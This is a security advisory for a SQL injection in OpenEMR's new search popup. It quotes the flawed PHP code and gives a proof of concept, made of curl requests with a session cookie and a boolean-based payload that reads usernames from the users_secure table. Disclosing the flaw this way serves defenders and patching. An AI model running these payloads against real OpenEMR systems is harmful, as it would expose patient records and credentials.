# CVE-2026-29187 - SQL Injection Vulnerability in new search popup

>  Weakness CWE-89
>> Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
>> The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. Learn more on MITRE.

### Summary

OpenEMR <8.0.0.3 contains a SQL injection vulnerability in the new search popup that can be exploited by authenticated attackers. The vulnerability exists due to insufficient input validation in the new search popup functionality.

### Details

The vulnerability occurs in the new search popup functionality where user-supplied input in the select relevance column and where condition is directly concatenated into SQL queries without proper sanitization. This allows attackers to inject malicious SQL code.

The vulnerability affects the following lines:

 - `interface/new/new_search_popup.php` [line 141](https://github.com/openemr/openemr/blob/7f27cbd146104b9adaffc4be3bd1185c28505873/interface/new/new_search_popup.php#L141)
 - `interface/new/new_search_popup.php` line [134](https://github.com/openemr/openemr/blob/7f27cbd146104b9adaffc4be3bd1185c28505873/interface/new/new_search_popup.php#L134) and [136](https://github.com/openemr/openemr/blob/7f27cbd146104b9adaffc4be3bd1185c28505873/interface/new/new_search_popup.php#L136)
 - `interface/new/new_search_popup.php` line [125](https://github.com/openemr/openemr/blob/7f27cbd146104b9adaffc4be3bd1185c28505873/interface/new/new_search_popup.php#L125) and [128](https://github.com/openemr/openemr/blob/7f27cbd146104b9adaffc4be3bd1185c28505873/interface/new/new_search_popup.php#L128)

```php
        foreach ($_REQUEST as $key => $value) {
            if (!str_starts_with((string) $key, 'mf_')) {
                continue; // "match field"
            }
            $fldname = substr((string) $key, 3);
            // pubpid requires special treatment.  Match on that is fatal.
            if ($fldname == 'pubpid') {
                $relevance .= " + 1000 * ( " . add_escape_custom($fldname) . " LIKE ? )";
                array_push($sqlBindArray, $value);
            } else {
                $relevance .= " + ( " . add_escape_custom($fldname) . " LIKE ? )";
                array_push($sqlBindArray, $value);
            }
            $where .= " OR " . add_escape_custom($fldname) . " LIKE ?";
            array_push($sqlBindArraySpecial, $value);
            echo "<input type='hidden' name='" . attr($key) . "' value='" . attr($value) . "' />\n";
            ++$numfields;
        }

        $sql = "SELECT *, ( $relevance ) AS relevance, " .
            "DATE_FORMAT(DOB,'%m/%d/%Y') as DOB_TS " .
            "FROM patient_data WHERE $where " .
            "ORDER BY relevance DESC, lname, fname, mname " .
            "LIMIT " . escape_limit($fstart) . ", " . escape_limit($MAXSHOW) . "";

        $sqlBindArray = array_merge($sqlBindArray, $sqlBindArraySpecial);
        $rez = sqlStatement($sql, $sqlBindArray);
```

```sql
SELECT *, ( 0 + ( <injection> LIKE ? ) ) AS relevance, DATE_FORMAT(DOB,'%m/%d/%Y') as DOB_TS FROM patient_data WHERE 1 = 0 OR <injection> LIKE ? ORDER BY relevance DESC, lname, fname, mname LIMIT 0, 100
```

### PoC

```
┌──(kali㉿kali)-[~]
└─$ curl -k -b "OpenEMR=5cb438753a9513cb01f5adc257ab474f" 'https://172.18.0.3/interface/new/new_search_popup.php?mf_"=test'           
<!DOCTYPE html>
<html>
<head>
    
<meta charset="utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
<link rel="shortcut icon" href="/public/images/logos/core/favicon/favicon.ico?t=1766556932" />

<link rel="stylesheet"  href="/public/themes/style_light.css?v=81" />

<script src="/public/assets/jquery/dist/jquery.min.js?v=81" type="text/javascript"></script>
<script src="/public/assets/bootstrap/dist/js/bootstrap.bundle.min.js?v=81" type="text/javascript"></script>
<script src="/library/js/utility.js?v=81" type="text/javascript"></script>
<script src="/interface/main/tabs/js/include_opener.js?v=81" type="text/javascript"></script>
<script src="/library/textformat.js?v=81" type="text/javascript"></script>
<script src="/library/dialog.js?v=81" type="text/javascript"></script>

<style>
  form {
    padding: 0;
    margin: 0;
  }

  #searchCriteria {
    text-align: center;
    width: 100%;
    font-size: 0.8rem;
    background-color: var(--gray300);
    font-weight: bold;
    padding: 3px;
  }

  #searchResultsHeader th {
    font-size: 0.7rem;
  }

  #searchResults {
    width: 100%;
    height: 80%;
    overflow: auto;
  }

  #searchResults table {
    width: 100%;
    border-collapse: collapse;
    background-color: var(--white);
  }

  #searchResults tr {
    cursor: pointer;
  }

  #searchResults td {
    font-size: 0.7rem;
    border-bottom: 1px solid var(--gray200);
  }

  .topResult {
    background-color: #ff9919;
  }

  .billing {
    color: var(--danger);
    font-weight: bold;
  }

  .highlight {
    background-color: var(--info);
    color: var(--white);
  }
</style>
</head>
<body class="body_top">
    <form method='post' action='new_search_popup.php' name='theform'>
        <input type="hidden" name="csrf_token_form" value="8d463d08b7f4e590085af22b77cfb2d3b921cb73" />
        <input type='hidden' name='fstart' value='0' />
        <input type='hidden' name='mf_&quot;' value='test' />
SQL Statement failed on preparation: SELECT *, ( 0 + ( \&quot; LIKE ? ) ) AS relevance, DATE_FORMAT(DOB,&#039;%m/%d/%Y&#039;) as DOB_TS FROM patient_data WHERE 1 = 0 OR \&quot; LIKE ? ORDER BY relevance DESC, lname, fname, mname LIMIT 0, 100'<br>
<h2><font color='red'>Query Error</font></h2><p><font color='red'>ERROR:</font> query failed: SELECT *, ( 0 + ( \" LIKE ? ) ) AS relevance, DATE_FORMAT(DOB,'%m/%d/%Y') as DOB_TS FROM patient_data WHERE 1 = 0 OR \" LIKE ? ORDER BY relevance DESC, lname, fname, mname LIMIT 0, 100</p><p>Error: <font color='red'>You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '\" LIKE ? ) ) AS relevance, DATE_FORMAT(DOB,'%m/%d/%Y') as DOB_TS FROM patien...' at line 1</font></p><br />/var/www/localhost/htdocs/openemr/interface/new/new_search_popup.php at 141:sqlStatement                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~]
└─$ curl -k -b "OpenEMR=5cb438753a9513cb01f5adc257ab474f" 'http://172.18.0.3/interface/new/new_search_popup.php?mf_(SELECT(username)FROM(users_secure))=ad_in%'

┌──(kali㉿kali)-[~]
└─$ 
```

There are multiple techniques to exploit it; one of them is a boolean-based attack, which works using the last payload:

```sql
SELECT *, ( 0 + ( (SELECT(username)FROM(users_secure)) LIKE "ad_in%" ) ) AS relevance, DATE_FORMAT(DOB,'%m/%d/%Y') as DOB_TS FROM patient_data WHERE 1 = 0 OR (SELECT(username)FROM(users_secure)) LIKE "ad_in%" ORDER BY relevance DESC, lname, fname, mname LIMIT 0, 100
```

### Impact

 - Unauthorized access to database information
 - Potential data breach of sensitive medical information
 - Server-side code execution (in some cases)
 - Database compromise

### Vulnerability Fix Process

1. Assess and validate the vulnerability
2. Request or assign a CVE ID
3. Create a private fork or private branch
4. Develop the fix
5. Write regression and security tests
6. Prepare release notes and security advisory draft
7. Publish the fix (code merge) and release a patched version
8. Publicly disclose the vulnerability

### Credits

 - Researcher: Christophe SUBLET
 - Organization: Grenoble INP - Esisar, UGA
 - Project: CyberSkills, Orion